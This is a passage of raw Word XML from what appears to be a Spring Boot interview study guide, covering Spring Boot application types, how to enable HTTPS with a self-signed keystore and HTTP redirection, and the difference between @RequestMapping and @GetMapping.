          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot provides the ability to develop command-line applications with minimal configuration. These applications can run as standalone Java applications without needing a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A494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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create quick prototypes or applications that require no web interface but might still leverage Spring's dependency injection, data access, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D3FE6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Batch Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D44A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Spring Boot is frequently used for creating batch processing applications that involve jobs like file processing, data transformation, scheduled jobs, and bulk data management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664684F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 Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot provides built-in integration with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handling large volumes of data processing, like reading from files, transforming data, and storing it in databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67160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Integration and Messaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4C36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Spring Boot simplifies the use of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for building messaging-based systems, where you can integrate various systems using channels, adapters, and transformers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A898E2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ssaging Queues</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot makes it easier to interact with message broker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 xml:space="preserve"> for asynchronous messaging and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2037E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loud Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E684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 Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot is a core technology for building cloud-native applications, especially with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It supports features like configuration management, service discovery (via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distributed tracing, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C406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oud Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot applications can be deployed to cloud platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AW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Azur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roku</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, thanks to its compatibility with Docker and Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B345CF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Security Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF9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Spring Boot simplifies integration with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DevOps and CI/CD Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71446F4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s </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>production-ready features</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actuator</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make it ideal for integration with DevOps tools, Continuous Integration/Continuous Deployment (CI/CD) pipelines, monitoring, and logging solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E4E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ocker</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot applications can easily be containerized with Docker, allowing for easier deployment and scalability in cloud environments or distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9AF2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Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot apps are commonly deployed in Kubernetes environments due to their self-contained nature and minimal configuration requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F50484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IoT (Internet of Things) Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F183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Event-Driven Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D668B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can be leveraged f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xml:space="preserve"> using frameworks like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pring Cloud Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where events trigger workflows or other actions within the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BCBC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provides support for asynchronous messaging using queues, topics, and other messaging systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845A462"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Serverless Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFE63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is well-suited for creating serverless applications with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS Lambda</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 Function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zure Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It allows building event-driven, scalable applications that respond to cloud events and services without worrying about managing infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF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Testing and Prototyping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78003E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nit and Integration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot simplifies writing unit and integration tests with built-in support for tools like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estRestTemplat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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6111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velopers can easily test Spring Boot applications by launching a server or mocking services and repositories, making it a good choice for prototyping and test-driven development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF31E4"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Real-Time Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789E4C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s</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With Spring Boot, you can build real-time applications, such as live updates, notifications, and online collaboration tools, using WebSockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A5DF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Spring Boot for These Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93A5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ified Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot's auto-configuration and embedded web servers (like Tomcat, Jetty, or Undertow) reduce the need for complex setup and configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513083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tion-Ready</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Built-in support for monitoring, logging, and health checks makes it easy to prepare Spring Boot applications for production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29E80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 Support</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot integrates seamlessly with other Spring projects like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for microservices development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8779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apid Development</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With Spring Boot, developers can quickly create production-grade applications without dealing with much configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1BF0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599" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A20BC7B" w14:textId="230ABC31" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="000C0733">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="623" w:name="_Toc197867837"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is https used in SpringBoot applications</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="623"/>
    </w:p>
    <w:p w14:paraId="5FCC6419" w14:textId="6C0BC26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Enable HTTPS in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE745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te a Self-Signed SSL Certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521039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testing purposes, you can generate a self-signed SSL certificate using the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Keytool</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93B2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mmand to generate a keystore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337128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tool -genkeypair -alias selfsigned -keyalg RSA -keysize 2048 -storetype PKCS12 -keystore keystore.p12 -validity 3650</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CFF1A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create a keystore.p12 file, which will contain your SSL certificate and private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75AD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application.properties or application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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2B514A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68AC666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PKCS12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E298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p12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7A6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22BFCD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rver.ssl.key-alias=selfsigned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333A48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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C2A5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231D8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6D43C36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AB766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p12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9DAD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357CE49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PKCS12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359313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selfsigned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2011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the explanation of the properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFCD35"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Specifies the port to run the HTTPS server (default for HTTPS is 443, but 8443 is commonly used in development).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6360308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 Path to the keystore file (either a file path or classpath resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32E02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 Password for the keystore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CDC641"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 Alias of the key in the keystore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B8B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direct HTTP to HTTPS (Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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configuring the redirection in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A68A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1BDD46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12DDDE7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builders.HttpSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB8E4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EnableWebSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E5C5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WebSecurityConfigurerAdapter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA84214" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FBCB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1A8127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7D88FE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A149D3B" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E0A8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CBBFF1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0336853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5DA0E00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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE3E1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4061AE6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E6CBDE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permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBDEC8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D27FE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iresChannel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258F12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requiresSecure();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927E5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AA95B4C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E20458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171935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TomcatEmbeddedServletContainerFactory tomcatEmbeddedServletContainerFactory() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D206C3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EmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4BF3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258797A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Port(8080); // Default HTTP port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD124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RedirectPort(8443); // Redirect to HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61E14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0BCAE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20744B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7B75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47D2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ing HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560FFC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your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541877A"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your application via https://localhost:8443 (or the port you configured).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF73BC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likely get a warning in the browser if you are using a self-signed certificate. You can bypass this warning for testing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCD65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Using Valid SSL Certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777EF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production environments, you should use a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>valid SSL certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> issued by a trusted Certificate Authority (CA) like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Let's Encryp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DigiCer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lobalSign</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or others. Instead of using a self-signed certificate, you'll need to replace the keystore.p12 file with the one containing the public and private key from the trusted certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F381CD0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B623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SL (Secure Socket Layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that data is encrypted, making communication between client and server secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A26E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provides simple configuration options for enabling HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763F6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elf-signed certificates for development and testing, but always use a valid certificate for production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103436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HTTP to HTTPS redirection ensures better security by forcing the usage of HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E6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ow you can enable and configur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for secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14EE78" w14:textId="499EBAF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600" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB3DE9" w14:textId="277BB1D4" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF10A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="624" w:name="_Toc197867838"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between RequestMapping and GetMapping</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="624"/>
    </w:p>
    <w:p w14:paraId="195C4FBA" w14:textId="703008A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difference between @RequestMapping and @GetMapping in Spring is in their usage and the level of specificity they provide when handling HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B60B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Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A5D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l-purpose annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is a more general-purpose annotation used to map HTTP requests to handler methods of MVC controllers in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4A96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upports all HTTP methods</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By default, @RequestMapping can be used for any HTTP method (GET, POST, PUT, DELETE, etc.). You can specify the HTTP method type by using the method attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202820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It is flexible and can handle multiple types of HTTP requests by specifying the method attribute. For example, it can handle GET, POST, PUT, DELETE, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542D1D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79A8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GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DD66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A27191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08FA61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8C4B8C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093AEA0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POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431539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postHello(@RequestBody String input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6361303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ceived: " + input;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283455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108A7A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GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641555B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ecialized for HTTP GET requests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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need to specify the HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since @GetMapping is specifically designed for GET requests, you don't need to explicitly define the HTTP method. It is assumed to be a GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555176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149186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hello")</w:t>
      </w:r>
    </w:p>
